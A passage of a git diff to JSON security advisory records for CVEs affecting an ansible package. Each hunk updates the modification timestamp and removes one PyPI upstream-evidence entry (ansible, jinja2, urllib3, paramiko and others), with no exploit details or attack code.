"pkg:pypi/kerberos@1.3.1", - "resource": "kerberos" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-3908.json b/advisories/BREW-ansible@13-CVE-2015-3908.json index 27e02a4ba0..35f704cceb 100644 --- a/advisories/BREW-ansible@13-CVE-2015-3908.json +++ b/advisories/BREW-ansible@13-CVE-2015-3908.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-3908", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w64c-pxjj-h866", "CVE-2015-3908", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-6240.json b/advisories/BREW-ansible@13-CVE-2015-6240.json index 1f9a961311..5fb94a606c 100644 --- a/advisories/BREW-ansible@13-CVE-2015-6240.json +++ b/advisories/BREW-ansible@13-CVE-2015-6240.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-6240", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wwwh-47wp-m522", "CVE-2015-6240", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-8557.json b/advisories/BREW-ansible@13-CVE-2015-8557.json index e5dda8a33e..87d2717253 100644 --- a/advisories/BREW-ansible@13-CVE-2015-8557.json +++ b/advisories/BREW-ansible@13-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-8557", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-10745.json b/advisories/BREW-ansible@13-CVE-2016-10745.json index 61b4aa7016..e9e0301477 100644 --- a/advisories/BREW-ansible@13-CVE-2016-10745.json +++ b/advisories/BREW-ansible@13-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-10745", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-3096.json b/advisories/BREW-ansible@13-CVE-2016-3096.json index 713e54778e..5f113e801e 100644 --- a/advisories/BREW-ansible@13-CVE-2016-3096.json +++ b/advisories/BREW-ansible@13-CVE-2016-3096.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-3096", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-rh6x-qvg7-rrmj", "CVE-2016-3096", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-8614.json b/advisories/BREW-ansible@13-CVE-2016-8614.json index dc5f731a1f..627cc4b83f 100644 --- a/advisories/BREW-ansible@13-CVE-2016-8614.json +++ b/advisories/BREW-ansible@13-CVE-2016-8614.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-8614", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cmwx-9m2h-x7v4", "CVE-2016-8614", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-8628.json b/advisories/BREW-ansible@13-CVE-2016-8628.json index a2c0b1fde4..62bcd17aaf 100644 --- a/advisories/BREW-ansible@13-CVE-2016-8628.json +++ b/advisories/BREW-ansible@13-CVE-2016-8628.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-8628", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jg4f-jqm5-4mgq", "CVE-2016-8628", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-8647.json b/advisories/BREW-ansible@13-CVE-2016-8647.json index 79b847ddf6..d7c5a475d4 100644 --- a/advisories/BREW-ansible@13-CVE-2016-8647.json +++ b/advisories/BREW-ansible@13-CVE-2016-8647.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-8647", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-x4cm-m36h-c6qj", "CVE-2016-8647", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-9015.json b/advisories/BREW-ansible@13-CVE-2016-9015.json index 36837fe153..22acf5917c 100644 --- a/advisories/BREW-ansible@13-CVE-2016-9015.json +++ b/advisories/BREW-ansible@13-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-9015", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-9587.json b/advisories/BREW-ansible@13-CVE-2016-9587.json index 4bb998a1d3..b224be1af4 100644 --- a/advisories/BREW-ansible@13-CVE-2016-9587.json +++ b/advisories/BREW-ansible@13-CVE-2016-9587.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-9587", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m956-frf4-m2wr", "CVE-2016-9587", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2017-18342.json b/advisories/BREW-ansible@13-CVE-2017-18342.json index 4a9bfc6b52..93eff968fc 100644 --- a/advisories/BREW-ansible@13-CVE-2017-18342.json +++ b/advisories/BREW-ansible@13-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2017-18342", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2017-7466.json b/advisories/BREW-ansible@13-CVE-2017-7466.json index f9e5ca1596..ebcb84bbb3 100644 --- a/advisories/BREW-ansible@13-CVE-2017-7466.json +++ b/advisories/BREW-ansible@13-CVE-2017-7466.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2017-7466", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3m8p-xpm6-8ww3", "CVE-2017-7466", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2017-7481.json b/advisories/BREW-ansible@13-CVE-2017-7481.json index 24f9aa4e40..4e7eb8a809 100644 --- a/advisories/BREW-ansible@13-CVE-2017-7481.json +++ b/advisories/BREW-ansible@13-CVE-2017-7481.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2017-7481", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w578-j992-554x", "CVE-2017-7481", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2017-7550.json b/advisories/BREW-ansible@13-CVE-2017-7550.json index 89c62de394..eb33007fcd 100644 --- a/advisories/BREW-ansible@13-CVE-2017-7550.json +++ b/advisories/BREW-ansible@13-CVE-2017-7550.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2017-7550", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-588w-w6mv-3cw5", "CVE-2017-7550", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-1000805.json b/advisories/BREW-ansible@13-CVE-2018-1000805.json index 882a336cce..40d2abad81 100644 --- a/advisories/BREW-ansible@13-CVE-2018-1000805.json +++ b/advisories/BREW-ansible@13-CVE-2018-1000805.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-1000805", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-f2j6-wrhh-v25m", "CVE-2018-1000805", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-10855.json b/advisories/BREW-ansible@13-CVE-2018-10855.json index 06aad9ba66..8bd096e4c3 100644 --- a/advisories/BREW-ansible@13-CVE-2018-10855.json +++ b/advisories/BREW-ansible@13-CVE-2018-10855.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-10855", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jwcc-j78w-j73w", "CVE-2018-10855", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-10874.json b/advisories/BREW-ansible@13-CVE-2018-10874.json index 5db912e1a9..ee18409897 100644 --- a/advisories/BREW-ansible@13-CVE-2018-10874.json +++ b/advisories/BREW-ansible@13-CVE-2018-10874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-10874", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3xvg-x47j-x75w", "CVE-2018-10874", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-10875.json b/advisories/BREW-ansible@13-CVE-2018-10875.json index f6a5d5543c..1919c324ca 100644 --- a/advisories/BREW-ansible@13-CVE-2018-10875.json +++ b/advisories/BREW-ansible@13-CVE-2018-10875.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-10875", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fc4h-467w-46rh", "CVE-2018-10875", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-16837.json b/advisories/BREW-ansible@13-CVE-2018-16837.json index d9b90e5dbd..269cf06e63 100644 --- a/advisories/BREW-ansible@13-CVE-2018-16837.json +++ b/advisories/BREW-ansible@13-CVE-2018-16837.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-16837", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hwrm-63v2-42g4", "CVE-2018-16837", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-16859.json b/advisories/BREW-ansible@13-CVE-2018-16859.json index c5c698b864..0f8984ce74 100644 --- a/advisories/BREW-ansible@13-CVE-2018-16859.json +++ b/advisories/BREW-ansible@13-CVE-2018-16859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-16859", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v735-2pp6-h86r", "CVE-2018-16859", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-16876.json b/advisories/BREW-ansible@13-CVE-2018-16876.json index 093387207e..8349912e16 100644 --- a/advisories/BREW-ansible@13-CVE-2018-16876.json +++ b/advisories/BREW-ansible@13-CVE-2018-16876.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-16876", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-j569-fghw-f9rx", "CVE-2018-16876", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-18074.json b/advisories/BREW-ansible@13-CVE-2018-18074.json index acfab65bfd..e8a43bd780 100644 --- a/advisories/BREW-ansible@13-CVE-2018-18074.json +++ b/advisories/BREW-ansible@13-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-18074", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-19787.json b/advisories/BREW-ansible@13-CVE-2018-19787.json index ad9470cc2f..188fb23fcd 100644 --- a/advisories/BREW-ansible@13-CVE-2018-19787.json +++ b/advisories/BREW-ansible@13-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-19787", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-20060.json b/advisories/BREW-ansible@13-CVE-2018-20060.json index 1694d66cd7..5d94f69687 100644 --- a/advisories/BREW-ansible@13-CVE-2018-20060.json +++ b/advisories/BREW-ansible@13-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-20060", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-25091.json b/advisories/BREW-ansible@13-CVE-2018-25091.json index a4e17987ed..6691426bed 100644 --- a/advisories/BREW-ansible@13-CVE-2018-25091.json +++ b/advisories/BREW-ansible@13-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-25091", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-7750.json b/advisories/BREW-ansible@13-CVE-2018-7750.json index 163c9332fc..205255d9b1 100644 --- a/advisories/BREW-ansible@13-CVE-2018-7750.json +++ b/advisories/BREW-ansible@13-CVE-2018-7750.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-7750", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-232r-66cg-79px", "CVE-2018-7750", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-10156.json b/advisories/BREW-ansible@13-CVE-2019-10156.json index 4d4d7ed03e..3853cdafd9 100644 --- a/advisories/BREW-ansible@13-CVE-2019-10156.json +++ b/advisories/BREW-ansible@13-CVE-2019-10156.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-10156", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-grgm-pph5-j5h7", "CVE-2019-10156", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-10206.json b/advisories/BREW-ansible@13-CVE-2019-10206.json index 0926c91a8d..0b5b41e63d 100644 --- a/advisories/BREW-ansible@13-CVE-2019-10206.json +++ b/advisories/BREW-ansible@13-CVE-2019-10206.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-10206", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cqmr-rcpr-cxh3", "CVE-2019-10206", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-10217.json b/advisories/BREW-ansible@13-CVE-2019-10217.json index 380edaa4bf..3066d5fbf9 100644 --- a/advisories/BREW-ansible@13-CVE-2019-10217.json +++ b/advisories/BREW-ansible@13-CVE-2019-10217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-10217", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p75j-wc34-527c", "CVE-2019-10217", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-10906.json b/advisories/BREW-ansible@13-CVE-2019-10906.json index 2dff3ba8eb..485a280193 100644 --- a/advisories/BREW-ansible@13-CVE-2019-10906.json +++ b/advisories/BREW-ansible@13-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-10906", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-11236.json b/advisories/BREW-ansible@13-CVE-2019-11236.json index 63c5feb0cb..407fe64614 100644 --- a/advisories/BREW-ansible@13-CVE-2019-11236.json +++ b/advisories/BREW-ansible@13-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-11236", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-11324.json b/advisories/BREW-ansible@13-CVE-2019-11324.json index 6684b97529..3c6efd8d9b 100644 --- a/advisories/BREW-ansible@13-CVE-2019-11324.json +++ b/advisories/BREW-ansible@13-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-11324", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14846.json b/advisories/BREW-ansible@13-CVE-2019-14846.json index f5e9841201..44c764d83c 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14846.json +++ b/advisories/BREW-ansible@13-CVE-2019-14846.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14846", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pm48-cvv2-29q5", "CVE-2019-14846", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14856.json b/advisories/BREW-ansible@13-CVE-2019-14856.json index ef6541f91a..5c39f70c52 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14856.json +++ b/advisories/BREW-ansible@13-CVE-2019-14856.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14856", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6fq2-x65v-v9h7", "CVE-2019-14856", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14858.json b/advisories/BREW-ansible@13-CVE-2019-14858.json index d1156f0c28..b90e2472ff 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14858.json +++ b/advisories/BREW-ansible@13-CVE-2019-14858.json @@ -2,7 